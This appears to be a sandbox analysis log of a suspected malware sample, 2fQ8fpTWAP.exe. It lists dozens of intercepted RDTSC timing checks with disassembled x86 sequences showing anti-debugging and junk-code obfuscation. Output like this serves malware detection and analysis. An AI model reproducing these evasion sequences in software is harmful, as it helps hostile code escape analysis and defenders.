Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7F6F34 second address: 7F6F38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7F7FEB second address: 7F7FF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F7A2CC6ACE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7F71B8 second address: 7F71BE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7F81BC second address: 7F81DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7A2CC6ACF3h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7F81DA second address: 7F8281 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F7A2D39F168h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 jno 00007F7A2D39F16Ch 0x00000029 push dword ptr fs:[00000000h] 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 push 00000000h 0x00000039 push ebx 0x0000003a call 00007F7A2D39F168h 0x0000003f pop ebx 0x00000040 mov dword ptr [esp+04h], ebx 0x00000044 add dword ptr [esp+04h], 00000015h 0x0000004c inc ebx 0x0000004d push ebx 0x0000004e ret 0x0000004f pop ebx 0x00000050 ret 0x00000051 mov edi, dword ptr [ebp+122D395Bh] 0x00000057 mov eax, dword ptr [ebp+122D0C99h] 0x0000005d pushad 0x0000005e sub eax, dword ptr [ebp+122D3AFBh] 0x00000064 mov bx, EF88h 0x00000068 popad 0x00000069 push FFFFFFFFh 0x0000006b jmp 00007F7A2D39F170h 0x00000070 nop 0x00000071 push eax 0x00000072 push edx 0x00000073 push ebx 0x00000074 jmp 00007F7A2D39F176h 0x00000079 pop ebx 0x0000007a rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7F8281 second address: 7F8286 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7FA145 second address: 7FA14B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7FA14B second address: 7FA14F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7FA14F second address: 7FA153 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7FC0CE second address: 7FC0DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7A2CC6ACEAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7FC0DC second address: 7FC0E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7FB101 second address: 7FB115 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7A2CC6ACEFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7FC0E0 second address: 7FC16D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b movsx edi, si 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F7A2D39F168h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a mov dword ptr [ebp+122D2C0Ch], ecx 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007F7A2D39F168h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 0000001Dh 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c jne 00007F7A2D39F168h 0x00000052 xchg eax, esi 0x00000053 push edi 0x00000054 push edi 0x00000055 jmp 00007F7A2D39F16Fh 0x0000005a pop edi 0x0000005b pop edi 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f ja 00007F7A2D39F16Ch 0x00000065 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7FD069 second address: 7FD07E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7FD07E second address: 7FD106 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2D39F178h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F7A2D39F168h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov ebx, dword ptr [ebp+122D39E3h] 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007F7A2D39F168h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 0000001Bh 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 push eax 0x00000049 jo 00007F7A2D39F175h 0x0000004f jmp 00007F7A2D39F16Fh 0x00000054 pop ebx 0x00000055 push eax 0x00000056 push edi 0x00000057 push ecx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7FF1F7 second address: 7FF1FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7FF1FE second address: 7FF215 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnc 00007F7A2D39F166h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F7A2D39F168h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7FF215 second address: 7FF226 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7A2CC6ACEDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7FF226 second address: 7FF22A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8062E2 second address: 8062E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8062E6 second address: 8062FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7A2D39F170h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8062FC second address: 806302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7A7D92 second address: 7A7DB5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F7A2D39F166h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7A2D39F175h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7A7DB5 second address: 7A7DC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 805B0D second address: 805B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 805B11 second address: 805B15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 805B15 second address: 805B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7A2D39F16Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 805B2D second address: 805B31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 805B31 second address: 805B67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F7A2D39F177h 0x0000000e ja 00007F7A2D39F166h 0x00000014 jc 00007F7A2D39F166h 0x0000001a popad 0x0000001b pushad 0x0000001c jnc 00007F7A2D39F166h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 805CFF second address: 805D0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jnc 00007F7A2CC6ACE6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 80A56A second address: 80A570 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 80A570 second address: 80A57D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 81083E second address: 810842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 80F60E second address: 80F62E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACEEh 0x00000007 jno 00007F7A2CC6ACE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F7A2CC6ACE6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 80F62E second address: 80F632 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 80FBE2 second address: 80FC0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F7A2CC6ACE6h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F7A2CC6ACE6h 0x00000013 jmp 00007F7A2CC6ACF5h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 80FC0A second address: 80FC1D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7A2D39F166h 0x00000008 jng 00007F7A2D39F166h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 80FC1D second address: 80FC23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 80FC23 second address: 80FC39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7A2D39F166h 0x0000000a popad 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jnp 00007F7A2D39F166h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 80FDC4 second address: 80FDF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F7A2CC6ACF3h 0x0000000a popad 0x0000000b jng 00007F7A2CC6ACE8h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jc 00007F7A2CC6ACEEh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 80FDF0 second address: 80FE0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F7A2D39F16Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F7A2D39F166h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7954C0 second address: 7954EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7A2CC6ACEEh 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F7A2CC6ACE6h 0x00000013 jmp 00007F7A2CC6ACEFh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7A4805 second address: 7A4822 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F7A2D39F16Ch 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jnl 00007F7A2D39F166h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 81C276 second address: 81C27D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 79F821 second address: 79F83F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F7A2D39F16Ch 0x0000000d jno 00007F7A2D39F166h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 79F83F second address: 79F844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 81B0E6 second address: 81B0F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 jl 00007F7A2D39F166h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7EBEB9 second address: 7EBEC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7EC5F2 second address: 7EC5F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7EC5F6 second address: 7EC608 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7A2CC6ACE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7EC703 second address: 7EC725 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7A2D39F176h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7EC725 second address: 7EC733 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7EC733 second address: 7EC738 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7EC738 second address: 7EC785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F7A2CC6ACE8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 stc 0x00000023 sub ecx, 79F94FB1h 0x00000029 push 00000004h 0x0000002b jmp 00007F7A2CC6ACF2h 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push ebx 0x00000034 jno 00007F7A2CC6ACE6h 0x0000003a pop ebx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7ECAAD second address: 7ECAB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7ECE70 second address: 7ECE8A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7A2CC6ACECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F7A2CC6ACE6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7ECE8A second address: 7ECEB5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7A2D39F166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b nop 0x0000000c mov edi, dword ptr [ebp+122D3BF7h] 0x00000012 lea eax, dword ptr [ebp+1249095Eh] 0x00000018 push ecx 0x00000019 mov dword ptr [ebp+122D2551h], edi 0x0000001f pop ecx 0x00000020 nop 0x00000021 push eax 0x00000022 push edx 0x00000023 jl 00007F7A2D39F168h 0x00000029 push eax 0x0000002a pop eax 0x0000002b rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7ECEB5 second address: 7ECED0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7A2CC6ACECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007F7A2CC6ACE6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7ECED0 second address: 7ECED6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7ECED6 second address: 7ECEDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7ECEDC second address: 7C9A89 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jnc 00007F7A2D39F16Ch 0x0000000f lea eax, dword ptr [ebp+1249091Ah] 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F7A2D39F168h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 0000001Ah 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f push edi 0x00000030 clc 0x00000031 pop ecx 0x00000032 push eax 0x00000033 jmp 00007F7A2D39F16Eh 0x00000038 mov dword ptr [esp], eax 0x0000003b push 00000000h 0x0000003d push ebx 0x0000003e call 00007F7A2D39F168h 0x00000043 pop ebx 0x00000044 mov dword ptr [esp+04h], ebx 0x00000048 add dword ptr [esp+04h], 00000019h 0x00000050 inc ebx 0x00000051 push ebx 0x00000052 ret 0x00000053 pop ebx 0x00000054 ret 0x00000055 mov dword ptr [ebp+122D17F4h], edi 0x0000005b call dword ptr [ebp+122D1AFCh] 0x00000061 push eax 0x00000062 push edx 0x00000063 je 00007F7A2D39F182h 0x00000069 jmp 00007F7A2D39F176h 0x0000006e js 00007F7A2D39F166h 0x00000074 jmp 00007F7A2D39F179h 0x00000079 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7C9A89 second address: 7C9A9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F7A2CC6ACE6h 0x0000000a jmp 00007F7A2CC6ACEBh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 81B67D second address: 81B68A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7A2D39F168h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 81B799 second address: 81B79F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 81B8EB second address: 81B8FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7A2D39F16Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 81B8FB second address: 81B8FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 81B8FF second address: 81B905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 81B905 second address: 81B913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F7A2CC6ACE6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 81B913 second address: 81B976 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2D39F177h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F7A2D39F16Ah 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F7A2D39F195h 0x00000017 jmp 00007F7A2D39F176h 0x0000001c jmp 00007F7A2D39F179h 0x00000021 push eax 0x00000022 push edx 0x00000023 push edi 0x00000024 pop edi 0x00000025 push eax 0x00000026 pop eax 0x00000027 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 81B976 second address: 81B980 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7A2CC6ACE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 81B980 second address: 81B9C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7A2D39F172h 0x00000008 jmp 00007F7A2D39F176h 0x0000000d jmp 00007F7A2D39F16Ah 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 jc 00007F7A2D39F166h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 81B9C0 second address: 81B9D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACF4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 81BC8F second address: 81BCB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2D39F16Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007F7A2D39F16Ch 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 823872 second address: 823897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7A2CC6ACF1h 0x0000000c jmp 00007F7A2CC6ACEDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 82266E second address: 822672 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
